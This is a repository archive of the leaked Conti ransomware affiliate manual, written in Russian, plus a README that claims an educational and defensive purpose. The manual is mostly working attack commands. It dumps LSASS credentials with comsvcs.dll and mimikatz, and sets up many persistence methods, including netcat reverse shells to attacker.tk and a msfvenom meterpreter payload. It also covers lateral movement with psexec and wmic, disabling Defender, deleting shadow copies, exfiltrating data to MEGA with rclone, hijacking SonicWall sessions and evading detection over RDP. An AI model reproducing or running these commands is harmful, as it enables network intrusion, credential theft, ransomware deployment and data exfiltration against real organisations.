сохраненных паролей в файлах групповых политик домена 171 | - execute-assembly /opt/cobalt_strike_extension_kit/exe/Net-GPPPassword.exe 172 | Аналог: 173 | - powershell-import /opt/PowerSploit-dev/Exfiltration/Get-GPPPassword.ps1 174 | 175 | (ТОЛЬКО С ПРИВИЛЕГИРОВАННЫМИ ПРАВАМИ*) 176 | 177 | Если у нас есть ПРИВИЛЕГИРОВАННЫЕ права, при помощи команды "hashdump" и "logonpasswords" мы можем получить хэши и пароли. Это быстрый способ получить пароли, но оно может не сработать. Например помешает AV. 178 | Лучше делать так: 179 | - Сделать ps и найти процесс LSASS.exe (Он хранит наши пароли).Запомните PID. 180 | - Сделать его dump. 181 | Переходим в beacon: 182 | - cd Windows 183 | - shell rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\Users\User1\lsass.dmp full 184 | - В параметре PID указать номер PID LSASS.exe 185 | - Директорию можете использовать любую где разрешена запись, например: C:\Users\User1\lsass.dmp 186 | Аналог: 187 | - execute-assembly /opt/cobalt_strike_extension_kit/exe/SharpDump.exe 188 | Когда сделаете dump, скачайте его. 189 | Как скачали, откройте у себя на машине mimikatz и выполните следующие команды. (lsass.dmp положите в папку с mimikatz) 190 | sekurlsa::minidump lsass.dmp 191 | sekurlsa::logonPasswords 192 | 193 | 194 | 195 | 196 | 197 | !------------------------------------------------------Persistence-----------------------------------------------------! 198 | (МОЖНО ВЫПОЛНИТЬ БЕЗ ПРИВИЛЕГИЙ) 199 | Создаем explorers.bat и добавляем этот код (Скобки не копируем): 200 | } 201 | @echo off 202 | set fullname=C:\Temp\explorers.exe 203 | set prog=explorers.exe 204 | :begin 205 | tasklist /fi "IMAGENAME eq %prog%"|>nul find "%prog%"||start "" "%fullname%" 206 | >nul ping 127.1 -n 6 207 | goto :begin 208 | } 209 | Далее загружаем нашу нагрузку explorers.exe и батник explorers.bat в любую директорию где можете записать файлы, например: "C:\Users\User1\Pictires" 210 | Далее открываем CS и открываем наш beacon и переходим в папку в которую загрузили наши файлы 211 | Выполняем команду(Она скроет наши файлы): 212 | shell attrib +h [explorers.exe] 213 | shell attrib +h [explorers.bat] 214 | Далее добавляем ключи в реестр: 215 | shell reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v explorers /t REG_SZ /d "C:\Temp\explorers.exe" 216 | shell reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v explorers /t REG_SZ /d "C:\Temp\explorers.bat" 217 | Проверка: 218 | shell reg query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /s 219 | ------------------------------------------------------------------------------------------------------------------------------------ 220 | Можно использовать powershell stager, но если запускаешь из под обычного пользователя, то на рабочем столе будет появляется и тут же закрываться окно cmd 221 | { 222 | @echo off 223 | set fullname=powershell.exe 224 | set paramtr= powershell -nop -w hidden -encodedcommand...(ваш stager) 225 | set prog=powershell.exe 226 | :begin 227 | tasklist /fi "IMAGENAME eq %prog%"|>nul find "%prog%"||start "" "%fullname%" "" "%paramtr%" 228 | >nul ping 127.1 -n 6 229 | goto :begin 230 | } 231 | Далее добавляем ключ в реестр: 232 | reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v explorers /t REG_SZ /d "C:\Temp\explorers.bat" 233 | Проверка: 234 | reg Query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /s 235 | 236 | Также ключ в реестре можно записать по этой директории reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, но чтобы создать ключ в этой директории нужны ПРИВИЛЕГИРОВАННЫЕ ПРАВА* 237 | 238 | !---In-memory---! 239 | Внедрение бэкдора, который будет висеть в оперативный памяти, имеет смысл, если нужно закрепиться на целевой машине, не оставляя никаких следов. Антивирусы обычно слабо контролируют деятельность в памяти, поскольку это сопряжено с большим дополнительным расходом ресурсов. Даже опытный пользователь вряд ли заметит что‑то, что скрыто внутри легального процесса. 240 | В качестве in-memory-бэкдора мы будем использовать meterpreter. Это, пожалуй, самый известный RAT, способный работать исключительно в памяти, не трогая при этом диск. 241 | 242 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=8888 -f raw -o meter32.bin exitfunc=thread StagerRetryCount=999999 243 | cmd$> inject_windows.exe PID meter32.bin 244 | 245 | За максимальную скрытность платим потерей персистентности после перезагрузки. 246 | Поскольку вредоносный поток запускается вне какой‑либо библиотеки, Procexp часто показывает такой поток как запущенный от нулевого адреса. 247 | 248 | Office 249 | Этот способ подойдет, если атакуемый пользователь часто работает с офисным пакетом. Не такая уж редкость! 250 | reg add "HKCU\Software\Microsoft\Office test\Special\Perf" /t REG_SZ /d C:\users\username\meter.dll 251 | 252 | Плюсы: переживает перезагрузку, подойдет любой пользователь. 253 | Минус: неуправляемый интервал запуска. 254 | 255 | (ТОЛЬКО С ПРИВИЛЕГИРОВАННЫМИ ПРАВАМИ*) 256 | 257 | !---Закрепление через "Планировщик задач"---! 258 | Закрепление через Планировщик задач будем делать через импорт нашей готовой xml. 259 | 1)запускаем готовый Python скрипт, и генерируем xml. 260 | Этот скрипт потребует внести несколько параметров: 261 | - start programm - это то что будет запускать это задача, powershell.exe | artifact.exe | rundll32.exe 262 | - stager PowerShell or other parameters - параметры передаваемые программе для запуска, для powershell.exe - это stager PowerShell, artifact.dll [Параметр] 263 | - date registration task - дата регистрации задачи, можно посмотреть у другой задачи под которую хотите замаскировать. 264 | - date end task - дата окончания задачи 265 | - time repeat task in day - через сколько будет повторяться задача, "PT3M" - каждый 3 минуты; "PT1Р" - каждый час; если программа запущена, то задача не будет запускать новую сессию программы. 266 | - name_xml - название вашей xml, используйте названия типо: Adobe Update, WindowsDefender и.т.д... 267 | После этого генерируется нужная xml. Далее загружаем её на ПК клиента на котором хотим закрепится. 268 | После этого переходим в директорию куда загрузили нашу xml и в beacon вводим команду: 269 | shell schtasks /Create /RU SYSTEM /XML Security_Update.xml /TN WinDefender 270 | После этого удаляем xml, она нам больше не нужна. 271 | rm Security_Update.xml 272 | 273 | 274 | !---Сервисы---! 275 | Используйте службы для закрепления, так как Service Manager будет сам перезапускать службу, если потребуется. 276 | 277 | shell sc create persistence binPath= "nc.exe -e \windows\system32\cmd.exe attacker.tk 8888" start= auto 278 | shell sc failure persistence reset= 0 actions= restart/60000/restart/60000/restart/60000 279 | shell sc start persistence 280 | 281 | Плюсы: переживает перезагрузку, управляемый интервал запуска, подходит любой пользователь. 282 | Минус: необходимы права администратора. 283 | 284 | !---Конфиги---! 285 | Организация персистентности через изменение конфигурации ОС — отличный способ спрятаться от антивируса. Это единственный случай, когда мы не используем вообще никакой исполняемый код. Но применимо это, только если у нас есть прямой доступ к целевой машине. 286 | Создание скрытого пользователя, от имени которого можно будет потом получить удаленный доступ, — это, пожалуй, самый известный вариант такой атаки. 287 | 288 | net user attacker p@ssw0rd /add 289 | net localgroup administrators /add attacker 290 | reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v attacker /t REG_DWORD /d 0 /f 291 | 292 | Простое и эффективное внедрение закладки в Windows через RDP: 293 | reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t reg_sz /d "\windows\system32\cmd.exe" 294 | reg add "HKLM\system\currentcontrolset\control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0x0 /f 295 | 296 | Плюсы: трудно обнаружить антивирусом, переживает перезагрузку. 297 | Минусы: требует права администратора/root, не подходит, если машина за NAT или файрволом. 298 | 299 | !---Дебаггер---! 300 | Если атакующий знает, что атакуемый пользователь часто запускает какую‑то программу, скажем калькулятор, то он может внедрить свой код в тело этой программы с помощью джойнера. Однако всякое вмешательство в исполняемые файлы неумолимо повышает уровень недоверия к ним со стороны антивируса. Куда более изящным исполнением будет перехват запуска: 301 | copy calc.exe _calc.exe 302 | reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\calc.exe" /v Debugger /t reg_sz /d "cmd /C _calc.exe & c:\windows\nc.exe -e c:\windows\system32\cmd.exe attacker.tk 8888" /f 303 | 304 | Как только victim запустит, а затем закроет калькулятор, атакующий примет reverse shell. 305 | 306 | Плюс: переживает перезагрузку. 307 | Минус: требует права администратора. 308 | 309 | !---Gflags---! 310 | Почти таким же образом можно организовать запуск своего кода, когда пользователь закрывает определенную программу. 311 | reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512 312 | reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1 313 | reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "nc -e \windows\system32\cmd.exe attacker.tk 8888" 314 | 315 | Плюс: переживает перезагрузку. 316 | Минус: требует права администратора. 317 | 318 | Autoruns этот способ не обнаруживает, но ты можешь проверить ветку реестра: 319 | HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit 320 | 321 | !---WMI---! 322 | Достаточно надежный способ автозапуска — через события WMI. Мы можем запускать бэкдор через равные интервалы времени. 323 | wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="persistence", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'" 324 | wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="persistence", ExecutablePath="C:\users\admin\meter.exe",CommandLineTemplate="C:\users\admin\meter.exe" 325 | wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="persistence"", Consumer="CommandLineEventConsumer.Name="persistence"" 326 | 327 | Плюсы: переживает перезагрузку, управляемый интервал запуска. 328 | Минус: требует права администратора. 329 | 330 | !---AppInit---! 331 | В Windows есть интересный способ внедрения библиотек в оконные приложения с помощью AppInit (они должны использовать user32.dll). 332 | reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t reg_dword /d 0x1 /f 333 | reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t reg_sz /d "c:\path\to\meter64.dll" /f 334 | reg add "HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t reg_dword /d 0x1 /f 335 | reg add "HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t reg_sz /d "c:\path\to\meter32.dll" /f 336 | 337 | Плюс: переживает перезагрузку. 338 | Минусы: требует права администратора, неуправляемый интервал запуска. 339 | 340 | !---Lsass---! 341 | Еще одна возможность — прописать библиотеку в системном процессе lsass. Это достаточно выгодное место, поскольку в данном процессе хранятся те самые учетные записи, которые мы извлекаем утилитой mimikatz. 342 | reg add "HKLM\system\currentcontrolset\control\lsa" /v "Notification Packages" /t reg_multi_sz /d "rassfm\0scecli\0meter" /f 343 | 344 | Плюс: переживает перезагрузку. 345 | Минусы: требуются права администратора, неуправляемый интервал запуска, можно убить систему. 346 | 347 | !---Winlogon---! 348 | Чтобы каждый раз, как кто‑то из пользователей входит в систему, открывался шелл, можно использовать механизм Winlogon. 349 | reg add "HKLM\software\microsoft\windows nt\currentversion\winlogon" /v UserInit /t reg_sz /d "c:\windows\system32\userinit.exe,c:\windows\meter.exe" 350 | 351 | Плюс: переживает перезагрузку. 352 | Минус: неуправляемый интервал запуска. 353 | 354 | !---Netsh---! 355 | Утилита настройки сети Netsh тоже позволяет подгружать произвольную библиотеку. Это открывает возможность организовать через нее импровизированную автозагрузку. Результат будет выглядеть безобидно, так как первоначально вызывается системный компонент Windows. 356 | cmd#> c:\windows\syswow64\netsh.exe 357 | netsh> add helper c:\windows\meter32.dll 358 | cmd#> reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v persistence /t REG_SZ /d "C:\Windows\SysWOW64\netsh.exe" 359 | 360 | В итоге получаем такую цепочку: autorun → netsh.exe → meter.dll. 361 | При этом meter.dll будет скрыт от глаз пользователя — он увидит лишь запуск легитимной Netsh, родной компонент Windows. 362 | 363 | Плюсы: переживает перезагрузку, сложно обнаружить пользователю. 364 | Минус: требует права администратора. 365 | 366 | 367 | 368 | 369 | 370 | !----------------------------------------------------Lateral Movement---------------------------------------------------! 371 | 372 | Если нам удалось получить логин и пароль пользователя на ПК жертвы, делаем spawnas Domain\Admin Password [listener], придёт новый агент, процесс будет запущенный под этим пользователем. 373 | 374 | Если мы нашли логин\пароль домен админа или пользователя, можем взять его токен, команда выглядит так 375 | - make_token Domain\Admin Pass 376 | если хотите снять токен, команда: 377 | - rev2self 378 | 379 | Переходим меню Cobalt Strike-->Visualization-->Target Table или нажимите на значок мишени. 380 | Тут будут находится ваши цели, после того как сделаете (net dclist, net domain_controllers, net computers, portscan) 381 | Нажимаем ПКМ на ПК на который хотим перепрыгнуть-->Jump: 382 | psexec 383 | psexec64 384 | psexecpsh 385 | ssh 386 | ssh-key 387 | winrm 388 | winrm64 389 | 390 | Если на агенте есть процесс system, при помощи команды getsystem можно поднять системные права. 391 | 392 | Если мы нашли логин и хэш пользователя и при этом хэш мы не смогли расшифровать , мы делаем такую команду pth Domain\Admin hash [command] 393 | (Нужны привилегированные права), при помощи команд: 394 | - shell dir \\ip 395 | - имя хоста\c$ 396 | проверим доступ на сервер или обычные ПК. 397 | Если есть доступ то нажимаем на сессии > File Browser > пишем путь \\ip или имя компьютера на который есть доступ \c$ , загружаем туда нагрузку 398 | shell wmic /node:[ip] process call create "rundll32.exe C:\Temp\artifact.dll StartW" 399 | shell wmic /node:[ip] process call create "C:\Temp\artifact.exe" 400 | 401 | 402 | 403 | !--------------------------------------------------Attacks-------------------------------------------------------------! 404 | !--BAT--! 405 | всё всегда запускаем от Администратора: 406 | uac - удаляет всплыв окна запроса разрешения на запуск от админа 407 | defoff - килл дефендер (работает не на всём, проверяем после в taskmgr наличие процесса Mspeng) 408 | RDP - поднимает 3389 порт 409 | 410 | 411 | del - delete Shadow copy (запрашивает разрешение на удаление, жмем - y) 412 | NS - монтируем скрытые системные диски (пасс:98) !! юзать после сноса АВ 413 | 414 | NLA+BACK - поправляет NLA + бэкдор для входа в систему без пароля, работает так: 415 | в окне входа (там где просит ввести креды) - жмём win+Y всплывает окно cmd 416 | пишем taskmgr, открываем вкладку юзерс, ПКМ по любому юзеру - конект 417 | p.s - на десятках не работает \ требует пасс 418 | 419 | 420 | СБОР БАТНИКА НА КОПИРОВАНИЕ ФАЙЛА ПО ВСЕМУ ДОМЕНУ 421 | start PsExec.exe /accepteula @C:\share$\comps1.txt -u DOMAIN\ADMINISTRATOR -p PASSWORD cmd /c COPY "\\PRIMARY ДОМЕН КОНТРОЛЛЕР\share$\fx166.exe" "C:\windows\temp\" 422 | СОХРАНЯЕМ КАК "COPY.BAT" 423 | 424 | СБОР БАТНИКА НА ЗАПУСК ФАЙЛА ПО ВСЕМУ ДОМЕНУ 425 | start PsExec.exe -d @C:\share$\comps1.txt -u DOMAIN\ADMINISTRATOR -p PASSWORD cmd /c c:\windows\temp\fx166.exe 426 | СОХРАНЯЕМ КАК "EXE.BAT" 427 | 428 | СБОР БАТНИКА WMI НА КОПИРОВАНИЕ И ЗАПУСК ФАЙЛА ПО ВСЕМУ ДОМЕНУ 429 | start wmic /node:@C:\share$\comps1.txt /user:"DOMAIN\Administrator" /password:"PASSWORD" process call create "cmd.exe /c bitsadmin /transfer fx166 \\ДОМЕН КОНТРОЛЛЕР\share$\fx166.exe %APPDATA%\fx166.exe&%APPDATA%\fx166.exe" 430 | 431 | 432 | !--------------------------------------------------------RDP------------------------------------------------------------! 433 | ЕСЛИ ОЧЕНЬ НУЖЕН РДП В ЛОКАЛКЕ :: КАК НЕ СПАЛИТЬСЯ :: 434 | 1. Выбираем серверную ОС , пингуем, нашли. Делаем листинг диры 435 | `ls \\REMOTE-HOSTNAME\C$\Users` 436 | Сортируем по Modified. Там где свежий тач - под этими пользаками заходить ТОЧНО НЕЛЬЗЯ потому что легко возникнет следующая ситуация - вы зашли, качаете шары\тестите чёто и вдруг этот пользак заходит на этот пк и видит ваши результаты работы... Детект. Чистка. Конец игры. 437 | Для этого выбираем пользака который на этот сервер ходил в прошлом году скажем. 438 | Механика думаю ясна? 439 | 2. Выбор пользака из ДА который висит в ДА но почти не используется 440 | 441 | shell net group "Domain Admins" /domain 442 | 443 | 444 | Это список наших ДА 445 | Далее на пользака по очереди снимаем инфу 446 | `shell net user Administrator /domain` 447 | Ищем строку Last Logon - то есть когда авторизоывался в сети последний раз(на любой из пк в сетке) 448 | Если там дата типа позапрошлый месяц,полугодие или ваще год - отлично. Это то что нам надо. Скорее всего это либо сервисная учетка либо админ которым они не ходят и вам на РДП он точно не помешает. 449 | 450 | Такие вот несложные приемы помогут не спалиться тупо на РДП 451 | 452 | 3. Не засижиаемся на РДП, после того как закончили - делаем Logoff (ОБЯЗАТЕЛЬНО). Не путать с просто закрыванием окна RDP. 453 | 454 | 455 | 456 | 457 | 458 | !---------------------------------------------Дополнительный Материал-------------------------------------------------------! 459 | 460 | !---RCLONE MANUAL--! 461 | 1. скачиваете рклон с оф сайта., создаем файлик rclone.conf и кладем его в одну папку с exe 462 | 2. далее открываем cmd от админа, переходим в папку, где лежит программа с файлом конфигурации и выполняем команду: rclone config 463 | 3. далее вылезает меню в котором мы создаем конфиг (грубо говоря вписываем логин и пароль меги), после того, как креды вписали, программка записывает их в файлик rclone.conf, в зашифрованном виде. 464 | 4. берем полученный файлик rclone.conf и саму прогу и кладем на хост, с которого собираемся тянуть инфу, класть разумеется лучше в укромное место 465 | 5. Переходим в CS beacon в папку куда положили конфиг и программу и выполняем команду: 466 | 467 | shell rclone.exe copy "\\trucamtldc01\E$\Data" remote:Data -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 468 | 469 | remote:Data - меняем только это. 470 | "remote" это название вашей меги. 471 | "NT" ваша директория в меге куда будет скачиваться, если нет ее, то создаст сам. 472 | 473 | ну, тут думаю понятно, то что в кавычках - это то, что выкачиваем, можем указывать как угодно, хоть весь диск 474 | remote - название конфига, которое мы указали при выполнении пункта 3, data - папка в меге, куда выгружается инфа 475 | 476 | !---SonicWall---! 477 | для тех кому надо работать с SonicWall через браузерные сессии 478 | Использование WEB-браузера для доступа 479 | 480 | - берём сессию из вывода скрипта, например "47ZjFKx24Nj2h0UtZKX2OYnZLgRg05aX2SuaotVzrQg=" 481 | - открываем браузер в режиме инкогнито, открываем консоль разработчика (js-console) 482 | - кодируем ID сессии в base64 483 | >> btoa ("47ZjFKx24Nj2h0UtZKX2OYnZLgRg05aX2SuaotVzrQg=") [ENTER] 484 | "NDdaakZLeDI0TmoyaDBVdFpLWDJPWW5aTGdSZzA1YVgyU3Vhb3RWenJRZz0=" 485 | - вбиваем в URL https://target (редиректит на https://target/cgi-bin/welcome) 486 | - идём в консоли в application/cookies, добавляем куку 487 | swap : NDdaakZLeDI0TmoyaDBVdFpLWDJPWW5aTGdSZzA1YVgyU3Vhb3RWenJRZz0= 488 | - в браузере (там, где .../cgi-bin/welcome) правим URL на https://target/cgi-bin/portal 489 | - получаем доступ к ресурсу под сессией пользователя 490 | 491 | !---Установка и найстройка Citrix---! 492 | ---------------------------------- 493 | Windows 7 или Windows 10 494 | Na nee InternetExplorer 11 ili google chrome 495 | Posle ustanovki braruzera nastraivaem Citrix Workspace 496 | 497 | Dlya win 7: https://www.citrix.com/en-gb/downloads/workspace-app/legacy-workspace-app-for-windows-ltsr/workspace-app-for-windows-1912-ltsr-cu2.html 498 | Dlya win10: https://www.citrix.com/en-gb/downloads/workspace-app/windows/workspace-app-for-windows-latest.htmlhttps://www.citrix.com/en-gb/downloads/workspace-app/windows/workspace-app-for-windows-latest.htmla win 10: 499 | https://www.citrix.com/en-gb/downloads/workspace-app/windows/workspace-app-for-windows-latest.html 500 | 501 | Ustanavlivaem citrix 502 | Dalee v brauzere vhodim v web-interface citrixa, vvodim login-pass potom zapuskaem deesktop (otkroetsya libo v browsere ili v citrixAPP) 503 | 504 | posle vhoda v desktop - podtyagivaem agenta v CS 505 | 506 | !------------------------------------------------------Questions----------------------------------------------------------! 507 | 508 | 509 | 14) Если вы нашли какой то пороль, можно его так же прогнать через smb_login - это инстурмент в metasploit, я выдам метасплойт и расскажу как им пользоваться . смб_логин покажет на какие сервера или ворки, есть доступ с этими кредами 510 | 511 | Как сортировать собраный АД с сети 512 | 1)Скачиваем FileZilla 513 | 2)Скачиваем Putty,пускаем Putty через тор 514 | Идем сюда https://www.torproject.org/download/tor/ 515 | Качае ВНИМАНИЕ Expert Bundle 516 | Разархивируем, идем в каталог Tor и запускаем tor.exe 517 | Через несколько секунд дойдет до написи 100% Done 518 | В настройках Putty заходим в прокси, ставим сокс5, айпи 127.0.0.1 порт 9050 519 | 3)Заходим через файлзиллу на сервер > заходи в директорию "Script" - кладем рядом со скриптом АД файлы 520 | 4) Переходим в Putty, заходим на сервер, переходи в директорию где лежит скрипт, даем команду 521 | ./script.sh 522 | 5) Готово, заходи обратно в FilleZilla и забираем наш сортед. После себя обязательно удляйте файлы АД и папку сортед, если папка сортед не удалятеся, просто переменуйте ее в любое название 523 | 524 | 525 | мануал по ЮЗЕРХАНТЕР при помощи него, мы и находим эти тачки. Так же ad_users требуеться нам, чтоб взять от туда SID, для голден тикета, но об этом позже 526 | . составляем список таргетов 527 | 1.1 Открываем ад_юзерс , ищем там кто нам потенциально интересен : admin / инженер / информ технологи / ИТ 528 | забираем логины учеток из sAMAccountName 529 | 1.2 Берём список домен админов 530 | 1.3 кладём в файл list.txt первых и вторых 531 | 532 | 2. Аплоадим пауэр вью. 533 | 2.1 powershell-import _/home/user/soft/powerview/view.ps1_ 534 | 2.1 --коммент: импортируем пауэр вью из /home/user/soft/powerview/view.ps1 535 | 536 | 2.3 Врубаем хантинг 537 | 2.3.1 538 | psinject 1884 x64 Invoke-UserHunter -Threads 20 -UserFile C:\ProgramData\list.txt >> C:\ProgramData\out.txt 539 | 540 | вместо 1884 - ПИД процесса куда нам хватает прав сделать инжект. 541 | х64 - или х86 разрядность процесса. см в тасклист 542 | В с\программдата\лист.тхт должен лежать список который мы делали в пункт №1. 543 | через 5-10-20 минут смотреть резалт в аут.тхт. Как заканчивает сразу пополняет его разом. то есть если файл 0байт значит работает либо АВ попалил(если попалил ав то в кобе увидите) -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # conti-pentester-guide-leak 2 | 3 | This repository was created to archive [leaked](https://therecord.media/disgruntled-ransomware-affiliate-leaks-the-conti-gangs-technical-manuals/) leaked pentesting materials, which were previously given to Conti ransomware group affilates: 4 | 5 | ![obraz](https://therecord.media/wp-content/uploads/2021/08/XSS-Conti-leakk-files-1024x258.png) 6 | 7 | Mentioned materials covers topics such us: 8 | * configure the Rclone software with a MEGA for data exfiltration 9 | * configure the AnyDesk software as a persistence and remote access solution into a victim’s network 10 | * elevate and gain admin rights inside a company’s hacked network 11 | * take over domain controllers 12 | * dump passwords from Active Directories 13 | * connect to hacked networks via RDP using a Ngrok secure tunnel 14 | * install the Metasploit pen-testing framework on a VPS 15 | * brute-force routers, NAS devices, and security cameras 16 | * configure and use the Cobalt Strike agent 17 | * perform a Kerberoasting attack 18 | * use the NetScan tool to scan internal networks 19 | * disable Windows Defender protections 20 | * delete shadow volume copies 21 | * configuring operating system to use the Tor and more 22 | 23 | Leaked content will give you more insight into how ransomware operators perform their attacks. Futhermore, you can improve your own pentesting skills. Defenders will also benefit from this - you can more eaisly detect and block Conti affilates attacks. 24 | 25 | UPDATE: vx-underground.org obtained more training materials and tools used by Conti ransomware operators. Posting those files could break Github ToS, however, you can find download url's for mentioned materials [here](https://pastebin.com/U71YVjjy). 26 | 27 | NOTE: Archive containing CobaltStrike crack was removed to please GitHub's Terms of Service. 28 | 29 | NOTE2: Materials are written in Russian language (however, due to misspells, threat actor is believed to be Ukrainian citizen) 30 | 31 | NOTE3: If something requires password, try "xss.is" or "exploit.in". Do not open tickets in regard of password-related problems, because there's nothing i can do about this :( 32 | 33 | # Disclaimer 34 | This project can only be used for educational purposes. Using this software against target systems without prior permission is illegal, and any damages from misuse of this software will not be the responsibility of the author. 35 | --------------------------------------------------------------------------------